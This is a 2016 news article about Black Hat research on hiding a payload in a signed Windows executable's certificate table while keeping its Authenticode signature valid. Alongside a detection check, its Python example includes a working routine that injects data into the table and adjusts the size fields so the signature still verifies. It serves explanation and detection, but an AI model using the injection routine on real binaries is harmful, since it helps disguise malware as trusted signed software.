Secretly Infecting Digitally Signed Files

Thursday, August 11, 2016 @ 12:08 PM gHale


There is a way to inject malware into a digitally signed Windows binary without invalidating its Authenticode signature: the signed hash that Windows checks stays the same, even though the file's content has changed.

Being able to pull off that feat means antivirus and security software that trusts a valid signature may never look closely at the malicious file, said researchers from security provider Deep Instinct at a Black Hat USA 2016 presentation.

When a user double-clicks a signed executable and Windows verifies it, three things happen: Windows parses the file's PE headers, validates the certificate chain embedded in the signature, and compares the hash recorded in that signature against a hash it computes over the file itself.

After reverse engineering this process, the Deep Instinct team built on the fact that the Authenticode hash does not cover the whole file: three regions are skipped when the hash is computed (a behavior Microsoft documents in its Authenticode PE signature format specification), so modifying those regions does not break the signature's validity.

The three regions are the CheckSum field in the PE optional header, the IMAGE_DIRECTORY_ENTRY_SECURITY entry in the DataDirectory (which records the file offset and size of the attribute certificate table), and the attribute certificate table itself. That table holds the PKCS#7 signature blob and sits after the last section's raw data; it is not mapped into memory by the loader.

In proof-of-concept code, the research team appended malicious code to the attribute certificate table, then enlarged the table's recorded size to cover it. The embedded certificate stayed intact and the Authenticode hash was unchanged. Note that the plain hash of the whole file (an MD5 or SHA-256 over every byte) does change, so hash-based blocklists and allowlists see a brand-new file; it is only the signed hash that survives.
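The following is an added example, not Deep Instinct's code or the proof of concept from the talk. It builds a small constructed PE32 file with a fake, non-cryptographic placeholder in place of the PKCS#7 blob (so nothing here is really signed), computes the Authenticode hash the way the specification describes (skipping CheckSum, the security directory entry and the certificate table), appends a constructed payload to the certificate table the way the paragraph above describes, and shows that the Authenticode hash is unchanged while a hash over the whole file is not. It also includes the check a scanner would want: look for non-padding bytes in the certificate table beyond the end of the DER-encoded signature. The helper names (`build_signed_pe`, `inject_into_cert_table`, `trailing_bytes_in_cert_table`) are this example's own; the offsets are from the PE/COFF and Authenticode specifications.

```python
"""Authenticode hashing vs. the three unsigned PE regions (constructed example)."""
import hashlib
import struct

# Field offsets from the PE/COFF and Authenticode specifications.
E_LFANEW_OFF = 0x3C
OPT_SIZEOFHEADERS = 60                    # SizeOfHeaders, inside the optional header
OPT_CHECKSUM = 64                         # CheckSum (same offset for PE32 and PE32+)
OPT_DATADIR = {0x10B: 96, 0x20B: 112}     # DataDirectory start: PE32 / PE32+
IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # entry pointing at the certificate table


def _layout(pe):
    """File offsets the Authenticode hash needs, read from the PE headers."""
    e_lfanew = struct.unpack_from("<I", pe, E_LFANEW_OFF)[0]
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                   # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    secdir = opt + OPT_DATADIR[magic] + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir)
    return {
        "checksum": opt + OPT_CHECKSUM,
        "secdir": secdir,
        "size_of_headers": struct.unpack_from("<I", pe, opt + OPT_SIZEOFHEADERS)[0],
        # (SizeOfRawData, PointerToRawData) of each 40-byte section header
        "sections": [struct.unpack_from("<II", pe, opt + opt_size + 40 * i + 16)
                     for i in range(nsections)],
        "cert_off": cert_off, "cert_size": cert_size,
    }


def authenticode_hash(pe, algo="sha256"):
    """Hash the image as WinVerifyTrust does: everything except CheckSum,
    the security data-directory entry and the attribute certificate table."""
    lay = _layout(pe)
    h = hashlib.new(algo)
    h.update(pe[:lay["checksum"]])                          # start .. CheckSum
    h.update(pe[lay["checksum"] + 4:lay["secdir"]])         # .. security dir entry
    h.update(pe[lay["secdir"] + 8:lay["size_of_headers"]])  # .. end of headers
    hashed = lay["size_of_headers"]
    for raw_size, raw_ptr in sorted(lay["sections"], key=lambda s: s[1]):
        h.update(pe[raw_ptr:raw_ptr + raw_size])            # section raw data, in file order
        hashed += raw_size
    if len(pe) > hashed:                                    # overlay, minus the cert table
        h.update(pe[hashed:len(pe) - lay["cert_size"]])
    return h.hexdigest()


def file_hash(pe):
    """Plain whole-file hash, the one AV allow/deny lists usually key on."""
    return hashlib.sha256(pe).hexdigest()


# Constructed stand-in for a PKCS#7 SignedData blob: a DER SEQUENCE with 300
# bytes of filler. It is not a real signature; only its DER framing matters here.
FAKE_PKCS7 = b"\x30\x82\x01\x2c" + bytes((i * 7) & 0xFF for i in range(300))


def build_signed_pe(pkcs7_der):
    """Minimal constructed PE32: one .text section, then a WIN_CERTIFICATE entry."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFF, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, OPT_SIZEOFHEADERS, 0x200)
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    cert_len = (8 + len(pkcs7_der) + 7) & ~7               # entries are 8-byte aligned
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, 0x400, cert_len)
    sect = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x200,
                                         0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + coff + bytes(opt) + sect
    headers += b"\0" * (0x200 - len(headers))
    code = bytes(range(256)) * 2                           # 0x200 bytes of filler "code"
    wincert = struct.pack("<IHH", cert_len, 0x0200, 0x0002) + pkcs7_der   # dwLength, rev, type
    wincert += b"\0" * (cert_len - 8 - len(pkcs7_der))
    return headers + code + wincert


def inject_into_cert_table(pe, payload):
    """Append payload inside the WIN_CERTIFICATE entry and grow both dwLength
    and the security directory Size so the table still 'covers' it."""
    lay = _layout(pe)
    if lay["cert_off"] + lay["cert_size"] != len(pe):
        raise ValueError("example assumes the certificate table ends the file")
    new_size = (lay["cert_size"] + len(payload) + 7) & ~7
    out = bytearray(pe) + payload + b"\0" * (new_size - lay["cert_size"] - len(payload))
    struct.pack_into("<I", out, lay["cert_off"], new_size)                  # dwLength
    struct.pack_into("<II", out, lay["secdir"], lay["cert_off"], new_size)  # dir entry
    return bytes(out)


def set_checksum(pe, value):
    """CheckSum is the third unsigned region: any value leaves the signature valid."""
    out = bytearray(pe)
    struct.pack_into("<I", out, _layout(pe)["checksum"], value)
    return bytes(out)


def _der_sequence_len(buf):
    """Total encoded length (tag + length + content) of the DER SEQUENCE at buf[0]."""
    if buf[0] != 0x30:
        raise ValueError("certificate entry does not start with a DER SEQUENCE")
    first = buf[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    return 2 + n + int.from_bytes(buf[2:2 + n], "big")


def trailing_bytes_in_cert_table(pe):
    """Detection: data in the WIN_CERTIFICATE entry past the end of the DER blob.
    Alignment padding is NUL; anything else there is not part of a signature."""
    lay = _layout(pe)
    dw_len = struct.unpack_from("<I", pe, lay["cert_off"])[0]
    entry = pe[lay["cert_off"] + 8:lay["cert_off"] + dw_len]
    return entry[_der_sequence_len(entry):].rstrip(b"\0")


if __name__ == "__main__":
    clean = build_signed_pe(FAKE_PKCS7)
    dirty = inject_into_cert_table(clean, b"constructed payload: not real shellcode")
    print("authenticode hash unchanged:", authenticode_hash(clean) == authenticode_hash(dirty))
    print("whole-file hash unchanged:  ", file_hash(clean) == file_hash(dirty))
    print("bytes past the signature:   ", trailing_bytes_in_cert_table(dirty))
```

The `trailing_bytes_in_cert_table` check is the cheap heuristic a scanner can run without parsing the signature at all: the outer DER length of the PKCS#7 structure says how long a well-formed signature entry should be, so anything non-NUL after it inside the WIN_CERTIFICATE entry is foreign data riding on the signature.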

This method is effective because malware authors do not even need to obfuscate their code: many antivirus and security products treat a file with a valid digital signature as trusted and skip or de-prioritize deeper scanning of it.

Because the signed hash is left intact, the technique also gets past secondary checks that re-verify the signature rather than merely noting its presence. One caveat: Microsoft's MS13-098 update (CVE-2013-3900, December 2013) added a stricter WinVerifyTrust mode, enabled through the EnableCertPaddingCheck registry value, that rejects certificate tables carrying data beyond the PKCS#7 structure; it is opt-in, so a default Windows install still accepts such a file.

The researchers also solved a second problem: the attribute certificate table is not a section, so the Windows loader never maps it into memory and code stored there cannot execute directly. Their launcher instead reads the payload back out of the file's own certificate table on disk and loads it manually in memory with a custom reflective PE loader.

Despite their success, the Deep Instinct team said their Reflective PE Loader currently supports only 32-bit executables; 64-bit support was not yet implemented.

For malware authors, this approach provides a way to hide malicious code in plain sight, right in the certificate table, the part of the file meant to vouch for its origin and protect users from malware.

The full paper is available from the Black Hat USA 2016 briefings archive.